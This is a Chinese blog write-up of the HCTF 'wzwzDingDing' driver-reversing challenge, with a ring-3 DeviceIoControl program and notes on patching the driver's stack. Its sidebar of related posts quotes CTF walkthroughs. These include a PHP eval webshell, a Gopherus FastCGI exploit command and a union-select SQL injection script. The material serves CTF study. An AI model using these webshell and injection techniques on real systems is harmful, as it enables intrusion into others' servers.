HCTF wzwzDingDing writeup

最新推荐文章于 2021-11-16 20:57:21 发布
原创 最新推荐文章于 2021-11-16 20:57:21 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了一道HCTF驱动题目的实现逻辑,包括驱动的功能分析、环3程序的编写及驱动崩溃的原因,揭示了补字节平衡堆栈的重要性,同时解答了关于字节传递至内核的疑惑。


CTF以前也没怎么参加过,参加也是抱大腿,这次师弟拉着我玩HCTF,就分析了一下里面wzwzDingDing 这个题目。

这个题目是一个64位的驱动,在ida里分析了一下。

首先找到正常的驱动分发函数里,看看这个驱动都完成什么功能。下面是驱动分发函数中,比较iocontrol code的地方。


然后进入每个处理分支,观察一下都做了什么。发现每个分支都有一个特点,满足相应的条件判断,就会将全局变量dword_148E0某位置为F。

比如: 88102004这个分支,当从ring3输入字符串为"^lejAJ]O"  "MNIII" 时,会分别置dword_148E0第六位 第五位为F,两次在ring3调用DeviceIoControlcode即可。

后面的分支每次按条件要求,依次在ring3调用DeviceIoControlcode, 让驱动走完每个iocontrol code的处理分支。

注意:8810200c的分支是判断ring3的映像文件名是否含有HCTF这几个字符。

           流程还需要走一个其它分支,这里就选择了0x88102014,就是jmp loc12788,这个分支会给第一位置F

 

接着写个ring3的程序,跑一下看看什么情况

<span style="font-size:14px;">  HANDLE hDev = CreateFile("\\\\.\\Hctf",GENERIC_READ |GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,OPEN_EXISTING ,0, NULL);
  DWORD code=0;
  DWORD dwShellcodeSize=0x104;
  char InBuf[] = "^lejAJ]O";
  char mniii[]="MNIII";
  char ret[]="\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3\xc3";
  char OutBuf[0x100]={0};
  DWORD dwRetBytes  = 0;
  char OutBuf2[0x100]={0};

  DeviceIoControl(hDev, 0x88102004,InBuf, 0x9, OutBuf, 0x100, &dwRetBytes, 0);
  DeviceIoControl(hDev, 0x88102004,mniii, 0x6, OutBuf, 0x100, &dwRetBytes, 0);
  DeviceIoControl(hDev, 0x88102008,ret, 16, OutBuf, 0x100, &dwRetBytes, 0);
  DeviceIoControl(hDev, 0x8810200c,ret, 16, OutBuf, 0x100, &dwRetBytes, 0);
  DeviceIoControl(hDev, 0x8810200c,ret, 16, OutBuf, 0x100, &dwRetBytes, 0);
  DeviceIoControl(hDev, 0x88102014,ret, 16, OutBuf, 0x100, &dwRetBytes, 0);
  DeviceIoControl(hDev, 0x88102010,ret, 16, OutBuf2, 0x100, &dwRetBytes, 0);

  CloseHandle(hDev);</span>


发现驱动直接crash在下面这个call里,调用到栈上的一个地址

到这就太想吐槽了,crash在这后,发现里面有一部分代码,还有类似循环的代码,还以为要怎么补成一个计算flag的算法,尼玛最后知道就是补成栈平衡就行,真是没做过ctf啊,太天真了。。


这题还有一个一直疑惑的问题,就是补的字节怎么从用户态传到内核,驱动知识太匮乏了。。因为看到在调用[rsp+0xC8+P]之前,有一部分代码,是往shellcode的位置写9个字节。推想应该是从ring3传进来的,然后在驱动里补齐。如下图所示这段代码:


补什么就不写了,平衡堆栈就行了,flag就是补的字节,有点坑。

前面也看到了对mdl的操作,貌似也没有映射用户态的内存。也应该不是从ring3的输入缓冲传进来的。 谁知道怎么搞,求指导,纠结~~~












trap0D
关注
HCTF】2015hctf单刷_writeup
wintersun的地带
12-09 3991
这是一份HCTF不完全writeup。。0x00 misc1拿到题目,binwalk分析下文件。发现zip文件结尾和png文件开头中间有一段数据,拿出该段数据,base64既视感,base32既视感,base16既视感。。flag:hctf{nn1sc_ls_s0_34sy!}0x01 web1访问,用burp抓包,看头。。hctf{w3lcome_t0_hc7f_f4f4f4}0x02 perso
2021L3HCTF luuuuua Writeup
qq_41866334的博客
11-15 5777
2021 L3HCTF luuuua Writeup AAA:immortal 这题做完以后感觉和ByteCTF2021的language binding很像,这是我之前写的Writeup 。 首先打开java层,发现asserts/res/test.lua里的逻辑是假的。然后通过LoginActivity里的afterTextChanged方法找到关键的b.c.a.b.a.d。 注意它 import org.keplerproject.luajava.LuaState; import org.ke
HCTF writeup(web)
weixin_34261739的博客
03-08 507
蓝冰 · 2014/11/29 16:47丘比龙的最爱 10pt传说,丘比龙是丘比特的弟弟,丘比龙是一只小爱神,虽然有两只翅膀,但因为吃多了,导致身体太胖,所以飞不起来~那么问题来了?!丘比龙吃什么食物吃多了变胖了很明显了,百度一下答案是甜甜圈nvshen 100pt猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag) 下载zip后是一个疑似base64的密文,用base64解密后发现...
老漏洞分析 CVE-2005-1935
trap0D的专栏
03-04 2358
前言好久没更新博客了,惭愧啊。这一阶段研究了一下web,selinux,写了点代码,工作也杂事比较多,方向更加模糊了,也就没写过什么。不过一上来发现,能用Markdown了,开心 这次分析一个老漏洞,直接远程代码执行,在今天应该是神洞了吧。其实也分析了很长时间了,今天贴出来分享一下。原理分析MSASN1.DLL调用BERDecBitString将BitString结构转换为BITBUF结构
UCTF WriteUp
安全汪
06-01 1352
第一题是关于BrainFuck语言的,没啥说的,直接编译就行了。 看到没有,Key直接出来了。 KEY{wjTdUoAgqzxxnjfa9kan} 推荐给大家一个比较好的网站:http://esoteric.sange.fi/brainfuck/impl/interp/i.html 2. 首先看到第二张图片是著名的“猪圈密码”,这个可能对于没有接触过CTF的同学来说比较陌生,不过没
[writeup]360-ctf-2014-re123
hellotaqini的博客
03-13 1015
三道简单的题目
2016HCTF giligili writeup
nidalaowo的专栏
11-30 1962
题目网址:http://re4js.hctf.io/         本题主要考察js及编程基本知识,包括js函数、进制转换、异或等。         打开网页看到一张gif图片,并听到那首非常有名的神曲,下面有个输入框,写着hctf{xxxxxx},点上去可以输入内容,但一回车就显示“Sorry,you are wrong...” 按惯例先打开源码,看到下面的一段js代码,答案就全在里
[2021XCTF]L3HCTF-Writeup(Web)
Y4tacker的博客
11-16 3358
文章目录写在前面WebImage Service 1Image Service 2Easy PHPbypass绕过方法一绕过方法二绕过方法Ncover 写在前面 这周刚好比较空就抽了点时间打了下,质量挺高的还是 Web Image Service 1 注册个账号,发现密码不能是admin 进去可以上传图片 flag在admin账户上传的图片中 源码都被编译了 感觉在任何地方输入admin 都会被ban, 伪造header也都不行 f12我查看源码的时候发现居然是支持表单提交 不会逆向go,那无源码情况
2016hctf writeup
Aurora的博客
03-04 3421
MISC杂项签到 http://139.224.54.27/webco1a/+_+.pcapng 用wireshark打开流量包,追踪TCP流,发现是一个webshell的流量,看到webshell控制端查看了远程服务器上的两个关键文件:function.py和flag cat function.py: #!/usr/bin/env python # coding:utf-8 __au
hctf2016 web 部分WriteUp.md
Bendawang's Blog
11-28 4936
hctf2016 web 部分WriteUp
ebCTF bin200 Writeup
##
08-10 915
刚接触CTF,做了一道简单的逆向题(题目链接)。这道题是一个掷骰子的游戏,只要能掷出一串特定的值就能得到flag。0x01 IDA加载分析使用IDA加载二进制文件,打开Strings window查看字符串。通过这些字符串可以看到只有一次掷出3-1-3-3-7就有可能得到flag,但是要随机掷出这些数字明显不可能,因为其中有个7!为此,需要跟进字符串“[*] You rolled a three!
2017 SSCTF Writeup
4ct10n
05-08 6001
2017 SSCTF Writeup
实验吧 逆向 小练习
Assassin
09-27 5147
阿拉丁神灯 迷得很,还以为需要真正的逆向,就是找到关键字符串…第一下就不合常理… 看来所有的逆向之前还是看一下段啊字符串什么有没有藏东西,或者看到返回的关键字爆搜一下嗯 FLAG 打开发现是什么输入flag?怎么像WEB???然后看到源码中有JS代码 关键的代码太多了,主要就是人工找到突破口吧。其实并不麻烦,因为你观察一下由短到长是有规律的,我倒是觉得是数据分析能力,用一个函数排...
pwnstep1-2 writeup
这里没人
04-22 1324
协会平台更新了。放一篇writeup一道pwn的简单题目,主要练练栈溢出。STEP1:nc连接上去之后是3个选项。其中1,2都有字符串的输入。先丢ida分析。 根据一些字符串的输出理清函数的调用关系。先来step1. 提示输入字符串(不限长度的)然后rol13加密。重点是如下的分支跳转。.text:0804891E 09C cmp [ebp+var_D],
实验吧 writeup
CHOOOU的博客
08-06 3294
实验吧 WP 有好几个题没做完,别骂我 WEB 认真一点! 没做出来~~~~~~~~~~~~~ 过滤了union sleep and 1’or’1’=’1 in 2’or’1’=’1 not 2’or’a’=’a in 2’or(ascii((select(database())))&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;1)or’a’=’b 2’or(ascii(substring(select(dat..
hctf 2016 write up
Shinpachi8的博客
11-27 3791
今年的hctf与几个哥们儿一起组队玩了一下。但是成绩比较惨淡。 但是还是把自己的writeup 写一下。 以做纪念。
悬镜安全实验室丨DirtyCow Linux权限提升漏洞分析(CVE-2016-5195)
Anprou的博客
11-14 1685
悬镜安全实验室原创文章,如需转载,请联系小编。首发平台:悬镜官网。
(翻译)完型填空(Fill in the Blanks)
gc_2299的博客
11-12 8795
问题概述 用户向应用系统输入数据。 示例 用途 用于为输入项添加说明时,却发现并不需要解释要输入什么内容的情况; 用于当为输入项添加冗长而复杂的标签后,反而造成用户难以理解的情况; 用于可以将输入项夹在一段文本中间,通过文本上下文来诠释输入项意义的情况; 用于必须填写输入项或者强烈建议填写输入项的情况。一段文本中有部分内容不全会困扰用户,让他们不由自主的要将内容补充完整[1]; ...
writeup
最新发布
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值